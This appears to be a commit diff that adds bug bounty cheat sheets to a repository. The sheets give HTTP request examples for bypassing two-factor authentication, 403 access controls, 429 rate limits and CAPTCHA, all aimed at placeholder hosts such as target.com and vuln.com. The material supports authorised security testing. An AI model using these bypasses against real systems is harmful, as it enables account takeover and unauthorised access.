Merge pull request #6 from kdairatchi/consolidation-2025

Major consolidation: Merge all bug bounty repositories

Author: thevillagehacker

AllAboutBugBounty

@@ -0,0 +1 @@
+Subproject commit 0a16c9d981a270ba20730ad36475ed7ce7ceb79e

Bug_bounty_Notes

@@ -0,0 +1 @@
+Subproject commit 78dfddbd3c971e5e5d5bf21b49bc226c14bf2deb

Bypass/Bypass 2FA.md

@@ -0,0 +1,95 @@
+# Bypass Two-Factor Authentication
+
+1. Response manipulation
+
+The response is
+```
+HTTP/1.1 404 Not Found
+...
+{"code": false}
+```
+Try this to bypass
+```
+HTTP/1.1 404 Not Found
+...
+{"code": true}
+```
+
+2. Status code manipulation
+
+The response is
+```
+HTTP/1.1 404 Not Found
+...
+{"code": false}
+```
+Try this to bypass
+```
+HTTP/1.1 200 OK
+...
+{"code": false}
+```
+
+3. 2FA Code in Response
+
+Always check the response!
+```
+POST /req-2fa/
+Host: vuln.com
+...
+email=victim@gmail.com
+```
+The response is
+```
+HTTP/1.1 200 OK
+...
+{"email": "victim@gmail.com", "code": "101010"}
+```
+
+4. JS Files may contain info about the 2FA Code (Rare case)
+   
+5. Bruteforce the 2FA code
+   
+6. Missing 2FA Code integrity validation, code for any user account can be used
+```
+POST /2fa/
+Host: vuln.com
+...
+email=attacker@gmail.com&code=382923
+```
+```
+POST /2fa/
+Host: vuln.com
+...
+email=victim@gmail.com&code=382923
+```
+   
+7. No CSRF protection on disabling 2FA, also there is no auth confirmation.
+
+8. 2FA gets disabled on password change/email change. 
+
+9. Clickjacking on 2FA disabling page, by iframing the 2FA Disabling page and lure the victim to disable the 2FA. 
+    
+10. Enabling 2FA doesn't expire previously active sessions, if the session is already hijacked and there is a session timeout vuln.
+
+11. 2FA code reusability, same code can be reused.
+
+12. Enter code 000000
+```
+POST /2fa/
+Host: vuln.com
+...
+code=00000
+```
+
+13. Enter code "null"
+```
+POST /2fa/
+Host: vuln.com
+...
+code=null
+```
+
+## References
+* [Harsh Bothra](https://twitter.com/harshbothra_)
+* Other writeup

Bypass/Bypass 403.md

@@ -0,0 +1,69 @@
+# Bypass 403 (Forbidden)
+
+1. Using "X-Original-URL" header
+```
+GET /admin HTTP/1.1
+Host: target.com
+```
+Try this to bypass
+```
+GET /anything HTTP/1.1
+Host: target.com
+X-Original-URL: /admin
+```
+
+2. Appending **%2e** after the first slash
+```
+http://target.com/admin => 403
+```
+Try this to bypass
+```
+http://target.com/%2e/admin => 200
+```
+
+3. Try add dot (.) slash (/) and semicolon (;) in the URL
+```
+http://target.com/admin => 403
+```
+Try this to bypass
+```
+http://target.com/secret/. => 200
+http://target.com//secret// => 200
+http://target.com/./secret/.. => 200
+http://target.com/;/secret => 200
+http://target.com/.;/secret => 200
+http://target.com//;//secret => 200
+```
+
+4. Add "..;/" after the directory name
+```
+http://target.com/admin
+```
+Try this to bypass
+```
+http://target.com/admin..;/
+```
+
+
+5. Try to uppercase the alphabet in the url
+```
+http://target.com/admin
+```
+Try this to bypass
+```
+http://target.com/aDmIN
+```
+
+6. Via Web Cache Poisoning
+```
+GET /anything HTTP/1.1
+Host: victim.com
+X­-Original-­URL: /admin
+```
+
+## Tools
+* [Bypass-403 | Go script for bypassing 403 forbidden](https://github.com/daffainfo/bypass-403)
+
+## References
+- [@iam_j0ker](https://twitter.com/iam_j0ker)
+- [Hacktricks](https://book.hacktricks.xyz/pentesting/pentesting-web)

Bypass/Bypass 429.md

@@ -0,0 +1,86 @@
+# Bypass 429 (Too Many Requests)
+ 
+1. Try add some custom header
+```
+X-Forwarded-For : 127.0.0.1
+X-Forwarded-Host : 127.0.0.1
+X-Client-IP : 127.0.0.1
+X-Remote-IP : 127.0.0.1
+X-Remote-Addr : 127.0.0.1
+X-Host : 127.0.0.1
+```
+For example:
+```
+POST /ForgotPass.php HTTP/1.1
+Host: target.com
+X-Forwarded-For : 127.0.0.1
+...
+
+email=victim@gmail.com
+```
+
+2. Adding Null Byte ( %00 ) or CRLF ( %09, %0d, %0a ) at the end of the Email can bypass rate limit.
+```
+POST /ForgotPass.php HTTP/1.1
+Host: target.com
+...
+
+email=victim@gmail.com%00
+```
+
+3. Try changing user-agents, cookies and IP address
+```
+POST /ForgotPass.php HTTP/1.1
+Host: target.com
+Cookie: xxxxxxxxxx
+...
+
+email=victim@gmail.com
+```
+Try this to bypass
+```
+POST /ForgotPass.php HTTP/1.1
+Host: target.com
+Cookie: aaaaaaaaaaaaa
+...
+
+email=victim@gmail.com
+```
+
+4. Add a random parameter on the last endpoint
+```
+POST /ForgotPass.php HTTP/1.1
+Host: target.com
+...
+
+email=victim@gmail.com
+```
+Try this to bypass
+```
+POST /ForgotPass.php?random HTTP/1.1
+Host: target.com
+...
+
+email=victim@gmail.com
+```
+
+5. Add space after the parameter value
+```
+POST /api/forgotpass HTTP/1.1
+Host: target.com
+...
+
+{"email":"victim@gmail.com"}
+```
+Try this to bypass
+```
+POST /api/forgotpass HTTP/1.1
+Host: target.com
+...
+
+{"email":"victim@gmail.com "}
+```
+
+## References
+* [Huzaifa Tahir](https://huzaifa-tahir.medium.com/methods-to-bypass-rate-limit-5185e6c67ecd)
+* [Gupta Bless](https://gupta-bless.medium.com/rate-limiting-and-its-bypassing-5146743b16be)

Bypass/Bypass Captcha.md

@@ -0,0 +1,77 @@
+# Bypass Captcha (Google reCAPTCHA)
+
+1. Try changing the request method, for example POST to GET
+```
+POST / HTTP 1.1
+Host: target.com
+...
+
+_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123
+```
+
+Change the method to GET
+```
+GET /?_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123 HTTP 1.1
+Host: target.com
+...
+```
+
+2. Try remove the value of the captcha parameter
+```
+POST / HTTP 1.1
+Host: target.com
+...
+
+_RequestVerificationToken=&_Username=daffa&_Password=test123
+```
+
+3. Try reuse old captcha token
+```
+POST / HTTP 1.1
+Host: target.com
+...
+
+_RequestVerificationToken=OLD_CAPTCHA_TOKEN&_Username=daffa&_Password=test123
+```
+
+4. Convert JSON data to normal request parameter
+```
+POST / HTTP 1.1
+Host: target.com
+...
+
+{"_RequestVerificationToken":"xxxxxxxxxxxxxx","_Username":"daffa","_Password":"test123"}
+```
+Convert to normal request
+```
+POST / HTTP 1.1
+Host: target.com
+...
+
+_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123
+```
+
+5. Try custom header to bypass captcha
+```
+X-Originating-IP: 127.0.0.1
+X-Forwarded-For: 127.0.0.1
+X-Remote-IP: 127.0.0.1
+X-Remote-Addr: 127.0.0.1
+```
+
+6. Change some specific characters of the captcha parameter and see if it is possible to bypass the restriction.
+```
+POST / HTTP 1.1
+Host: target.com
+...
+
+_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123
+```
+Try this to bypass
+```
+POST / HTTP 1.1
+Host: target.com
+...
+
+_RequestVerificationToken=xxxdxxxaxxcxxx&_Username=daffa&_Password=test123
+```

CONTRIBUTING.md

@@ -0,0 +1,53 @@
+# Contributing to Bug-Hunting-Arsenal
+
+Thank you for your interest in contributing to the Bug-Hunting-Arsenal! This repository thrives on community contributions.
+
+## How to Contribute
+
+### 1. Payload Contributions
+- Ensure payloads are tested and verified
+- Include context and usage examples
+- Follow existing naming conventions
+- Add to appropriate category directory
+
+### 2. Tool Submissions
+- Include installation instructions
+- Provide usage examples
+- Test on multiple platforms
+- Document any dependencies
+
+### 3. Methodology Updates
+- Share real-world testing experiences
+- Include step-by-step procedures
+- Add screenshots where helpful
+- Reference supporting materials
+
+### 4. Documentation Improvements
+- Fix typos and formatting issues
+- Improve existing explanations
+- Add missing documentation
+- Enhance navigation and organization
+
+## Submission Process
+
+1. Fork the repository
+2. Create a feature branch
+3. Make your changes
+4. Test thoroughly
+5. Submit a pull request
+
+## Quality Standards
+
+- All submissions must be legal and ethical
+- Include proper attribution for external sources
+- Ensure content is original or properly licensed
+- Test all code and scripts before submission
+
+## Code of Conduct
+
+- Be respectful and professional
+- Focus on constructive feedback
+- Collaborate openly and inclusively
+- Maintain high ethical standards
+
+Thank you for helping make this arsenal better for everyone!